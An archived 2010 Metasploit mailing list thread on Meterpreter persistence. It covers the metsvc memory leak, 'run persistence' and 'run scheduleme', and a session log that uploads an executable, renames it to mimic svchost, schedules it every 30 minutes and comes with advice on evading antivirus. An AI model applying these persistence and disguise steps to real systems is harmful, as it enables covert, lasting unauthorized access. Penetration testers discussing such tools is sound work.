Metasploit mailing list archives
Re: A little more about the metsvc service .
From: "Sherif Eldeeb" <archeldeeb () gmail com>
Date: Wed, 7 Jul 2010 16:19:25 +0300
"run persistence" is a nice way to make sure your meterpreter will survive a reboot, but I use it mostly when I have no admin rights, I'm usually using "run scheduleme" as a backup plan, you have to be admin or SYSTEM, UAC must be disabled "if Vista" and you have to have a meterpreter.exe file ready to be uploaded since it won't create one for you on the fly like "run persistence does, VBS" I really wish there is an option inside "run scheduleme" to create meterpreter payloads on the fly to save one step, but no complains, anyway, the good thing is that using this method your meterpreter session will be always started as "SYSTEM", it will copy the executable to a temp folder and rename it to something like "svhostXX.exe" so you have to beware of AVs to make sure that it won't be caught, then it'll schedule its execution based on the given options in a task named "syscheckXX", and tells you how to undo the whole thing "thanks HD!", if the prerequisites of the run scheduleme bothers you, just stick to run persistence since it works sometimes with normal users "when choosing the option to run at user login, not system startup": meterpreter > run scheduleme -h Scheduleme -- provides most common scheduling types used during a pentest This script can upload a given executable or script and schedule it to be executed. All scheduled task are run as System so the Meterpreter process must be System or local admin for local schedules and Administrator for remote schedules OPTIONS: -c <opt> Command to execute at the given time. If options for execution nee ded use double quotes -d Daily. -e <opt> Executable or script to upload to target host, will not work with remote schedule -h Help menu. -hr <opt> Every specified hours 1-23. -i Run command imediatly and only once. -l When a user logs on. -m <opt> Every specified amount of minutes 1-1439 -o <opt> Options for executable when upload method used -p Password for account provided. -r Remote Schedule. Executable has to be already on remote target -s At system startup. -t <opt> Remote system to schedule job. -u Username of account with administrative privelages. meterpreter > run scheduleme -e /root/IA.exe -m 30 [*] Uploading /root/IA.exe.... [*] /root/IA.exe uploaded! [*] Scheduling command C:\DOCUME~1\victim\LOCALS~1\Temp\svhost60.exe to run minute..... [*] The scheduled task has been successfully created [*] For cleanup run schtasks /delete /tn syscheck65 /F meterpreter > sherif. -----Original Message----- From: framework-bounces () spool metasploit com [mailto:framework-bounces () spool metasploit com] On Behalf Of Matt Gardenghi Sent: Wednesday, July 07, 2010 3:44 PM To: framework () spool metasploit com Subject: Re: [framework] A little more about the metsvc service . My experience with metsvc is that it has a memory leak.... I've had it tank multiple systems before I figured that out. I haven't played with it yet, but the supported technique is to use "run persistence." You might want to look into spending time there instead. Matt On 7/7/2010 4:23 AM, ubt wrote:
What if I insert a small code to ask for a password authentication in the _try do block of the server_setup.c beforehand,and one can't install the metsvc service again to overwrite an installed metsvc service? _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- A little more about the metsvc service . ubt (Jul 07)
- Re: A little more about the metsvc service . Matt Gardenghi (Jul 07)
- Re: A little more about the metsvc service . Sherif Eldeeb (Jul 07)
- Re: A little more about the metsvc service . Matt Gardenghi (Jul 07)